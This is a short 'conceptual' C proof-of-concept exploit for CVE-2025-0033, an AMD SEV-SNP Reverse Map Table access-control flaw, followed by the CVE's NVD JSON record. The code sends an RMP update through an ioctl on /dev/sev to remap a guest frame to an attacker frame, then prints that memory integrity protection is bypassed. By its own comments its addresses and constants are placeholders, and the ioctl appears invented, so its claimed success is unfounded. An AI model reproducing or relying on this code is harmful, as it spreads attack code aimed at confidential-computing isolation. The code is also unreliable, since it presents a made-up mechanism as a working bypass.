CVE-2025-0033

# CVE-2025-0033 PoC - Conceptual Proof of Concept # AMD SEV-SNP RMP Improper Access Control Vulnerability # This is a conceptual PoC demonstrating the attack vector #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #include <sys/ioctl.h> #include <sys/mman.h> // RMP (Reverse Map Table) related definitions // In a real exploit, these would be obtained from AMD documentation #define RMP_BASE_ADDR 0xFE000000ULL // Example RMP base address #define RMP_ENTRY_SIZE 16 // Each RMP entry is 16 bytes #define SNP_INIT_PHASE 0x1 // SNP initialization phase marker // SEV-SNP command structure (simplified) struct sev_snp_rmp_update { unsigned long gfn; // Guest Frame Number unsigned long pfn; // Physical Frame Number unsigned int flags; // Operation flags unsigned int rmp_page_type; // RMP page type assignment }; /* * Function: exploit_rmp_access_control * Description: Attempts to write to RMP during SNP initialization * exploiting the improper access control (CVE-2025-0033) * Note: Requires admin privileges (PR:H) as per CVSS vector */ int exploit_rmp_access_control(unsigned long target_gfn, unsigned long attacker_pfn) { int fd; struct sev_snp_rmp_update update_req; void *rmp_entry; // Step 1: Open the SEV-SNP device (requires admin privileges) fd = open("/dev/sev", O_RDWR); if (fd < 0) { perror("[-] Failed to open SEV device. Admin privileges required."); return -1; } printf("[+] Opened /dev/sev device\n"); // Step 2: Prepare the malicious RMP update request // The vulnerability allows writing to RMP during initialization // without proper authorization checks update_req.gfn = target_gfn; update_req.pfn = attacker_pfn; update_req.flags = SNP_INIT_PHASE; // Exploit during init phase update_req.rmp_page_type = 0x1; // Mark as valid SNP page // Step 3: Attempt unauthorized RMP write // Due to CVE-2025-0033, this write succeeds when it should be blocked if (ioctl(fd, 0x20 /* SEV_SNP_RMP_UPDATE */, &update_req) < 0) { perror("[-] RMP update failed"); close(fd); return -1; } printf("[+] RMP entry modified successfully!\n"); printf("[+] Guest frame %lu now mapped to attacker-controlled frame %lu\n", target_gfn, attacker_pfn); printf("[+] SEV-SNP memory integrity protection bypassed\n"); close(fd); return 0; } int main(int argc, char *argv[]) { unsigned long target_gfn = 0x1000; unsigned long attacker_pfn = 0x2000; if (argc >= 3) { target_gfn = strtoul(argv[1], NULL, 16); attacker_pfn = strtoul(argv[2], NULL, 16); } printf("[*] CVE-2025-0033 - AMD SEV-SNP RMP Access Control Bypass PoC\n"); printf("[*] Targeting GFN: 0x%lx -> PFN: 0x%lx\n", target_gfn, attacker_pfn); return exploit_rmp_access_control(target_gfn, attacker_pfn); }

{"cve": {"id": "CVE-2025-0033", "sourceIdentifier": "[email protected]", "published": "2025-10-14T15:16:00.787", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper access control within AMD SEV-SNP could allow an admin privileged attacker to write to the RMP during SNP initialization, potentially resulting in a loss of SEV-SNP guest memory integrity."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:N/I:H/A:N", "baseScore": 6.0, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.5, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-3020.html", "source": "[email protected]"}]}}